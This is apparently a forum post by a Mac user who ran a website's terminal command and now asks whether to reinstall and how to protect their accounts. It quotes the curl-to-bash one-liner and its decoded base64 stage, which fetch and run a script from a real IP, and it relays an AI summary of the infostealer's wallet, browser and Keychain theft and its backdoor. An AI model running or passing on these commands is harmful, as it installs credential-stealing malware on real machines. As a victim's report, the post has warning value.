趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件
刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"
感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲
看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本
看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令
窃取密码 🔑它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。
窃取加密货币钱包 💰 (主要目标)浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。
桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。
- 窃取各类浏览器数据 🌐它会攻击市面上几乎所有的主流浏览器( Chrome, Safari, Firefox, Edge, Brave, Opera 等)。
窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。
- 窃取个人敏感文件 📄钥匙串 (Keychain): 复制你整个系统钥匙串文件,里面可能包含你的 Wi-Fi 密码、应用密码等。
备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。
本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。
- 打包上传,发送给黑客 📤它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。
然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。
- 植入后门并替换正常程序 🚪持久化后门: 它会用你输入的密码,在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑,这个恶意软件也会自动运行,让黑客可以持续控制你的电脑。
程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。
这个是不是只能重装系统了?我还要做什么来保护自己的账户吗
